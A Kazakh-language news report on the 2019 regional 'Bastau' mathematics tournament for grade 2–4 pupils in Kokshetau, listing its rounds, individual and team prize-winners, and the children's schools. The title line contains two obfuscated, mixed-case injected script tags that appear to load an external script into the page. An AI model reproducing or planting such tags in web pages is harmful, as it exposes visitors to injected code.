2019 жылғы 15-17 мамыр аралығында 2-4 сынып оқушыларына арналған «Бастау» математикалық турнирінің облыстық кезеңі<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.05.2019

2018-2019 оқу жылының 15-17 мамыр аралығындағы дарынды балаларға арналған №3 облыстық мамандандырылған  мектеп-интернатының базасында (Көкшетау қаласы Ж.Саин көшесі 20) 2-4 сынып оқушыларына арналған «Бастау» математикалық турнирінің облыстық кезеңі өтті.

Турнирдің мақсаты − математикалық қабілеті айқын білінген дарынды бастауыш мектеп оқушыларын табу, дамыту және қолдау көрсету болып табылады.

Турнирдің негізгі міндеттері:

− математика саласында дарынды бастауыш сынып оқушыларының қызығушылықтарына қарай шығармашылық қарым-қатынас үшін арнайы топтық жарыс түрінде жағдай туғызу;

− республикалық дарынды бастауыш сынып оқушыларының ішінен математика пәні бойынша олимпиадалық құраманы қалыптастыру;

− бастауыш сынып оқушыларының танымдық және шығармашылық белсенділіктерін ынталандыру, математика пәні бойынша бастауыш сынып оқушыларының білімдерін тереңдету және  кеңейту.

«Бастау» математикалық турнирінің облыстық кезеңі 3 айналымнан тұрады:

1 айналым − «Әу Баста» (жазбаша топтық олимпиада)

2  айналым − «Асық» (ауызша топтық олимпиада)

3 айналым − «Математикалық бәйге» (ауызша жеке олимпиада)

Ақмола облысының аудандарынан барлығы 39 оқушы қатысты.

Барлық қатысушыларға сертификаттар берілді. Математикалық турнирдің қорытындысы нәтижесінде   жүлдегерлер анықталды.

І дәрежелі дипломмен марапатталғандар:

  1. Белич Никита  − Жарқайың ауданының Крупск атындағы мектебінің 2 сынып  оқушысы;
  2. Есимсеитов Алан  − Көкшетау қаласы, №17 мектеп-гимназиясының 3 сынып оқушысы;
  3. Лянной Роман  − Көкшетау қаласы, №17 мектеп-гимназиясының 4 сынып оқушысы;
  4. Аманжолов Әмір − М.Ғабдуллин атындағы №3 көптілде оқытатын кәсіби  мектеп-гимназиясының 2 сынып оқушысы;
  5. Мұратбек Ислам  − ІТ мектеп-лицейінің  3 сынып оқушысы;
  6. Төлендиев Темирлан − М.Ғабдуллин атындағы №3  көптілде оқытатын кәсіби мектеп-гимназиясының 4 сынып оқушысы;

ІІ дәрежелі дипломмен марапатталғандар:

  1. Воронкова Лидия  − Ақкөл ауданы, №1 Ақкөл орта мектебінің 2 сынып оқушысы;
  2. Шевнина Дарья   − Есіл ауданы, Курский орта мектебінің  3 сынып оқушысы;
  3. Цертик Ева  − Жақсы ауданы, №2 Жақсы орта мектебінің 4 сынып оқушысы;
  4. Қайырбек Бақытжан − Көкшетау қаласы, ІТ мектеп-лицейінің  2 сынып оқушысы;
  5. Букешов Рауан − Көкшетау қаласы, М.Ғабдуллин атындағы №3 көптілде оқытатын кәсіби  мектеп-гимназиясының 3 сынып оқушысы;
  6. Құдайберген Әділетәли − Көкшетау қаласы, ІТ мектеп-лицейінің  4 сынып оқушысы;

ІІІ дәрежелі  дипломмен марапатталғандар:

  1. Караулов Абай  −Бурабай ауданы, №1 мектеп-гимназиясының 2 сынып оқушысы; 
  2. Распаева Милена  − Ақкөл ауданы, №1 Ақкөл орта мектебінің 3 сынып оқушысы;
  3. Мирембаев Адиль  − Ақкөл ауданы, №2 Ақкөл орта мектебінің 3 сынып оқушысы;
  4. Еркебулан Аруана − Целиноград ауданы, №2 Қосшы орта мектебінің  2 сынып оқушысы;
  5. Қаппасова Аружан − Целиноград ауданы, №2 Қосшы орта мектебінің  3 сынып оқушысы;
  6. Кенжебай Алихан − Көкшетау қаласы, С.Жүнісов атындағы №18 орта мектеп-лицейінің  4 сынып оқушысы;

Грамотамен марапатталғандар:

  1. Баимбетов Ильяс  − Сандықтау ауданы, Сандықтау орта мектебінің 2 сынып оқушысы
  2. Сатыбаев Ержан  − Бурабай ауданы, №1 мектеп-гимназиясының 3 сынып оқушысы; 
  3. Гармаш Дарья  − Сандықтау ауданы, Сандықтау орта мектебінің 4 сынып оқушысы;

Командалық есепте І дәрежелі дипломмен марапатталғандар:

  1. Көкшетау қаласы, ІТ мектеп -лицейінің командасы;
  2. Көкшетау қаласы, № 17 орта мектеп-гимназиясының командасы;

Командалық есепте ІІ дәрежелі дипломмен марапатталғандар:

  1. Көкшетау қаласы, М.Ғабдуллин атындағы №3 мектеп-гимназиясының командасы;
  2. Есіл ауданының командасы;  

Командалық есепте ІІІ дәрежелі дипломмен марапатталғандар:

  1. Целиноград ауданының  командасы;
  2. Ақкөл ауданының командасы;

Барлық жүлдегерлерге бағалы сыйлықтар берілді. Жүлдегерлеріміздіқұттықтай отыра, әрдайым биік шыңдардан көріне берулеріңізге тілектеспіз!

Просмотров: 561


Пікір қосу



Деректерді қолтаңбаға қосу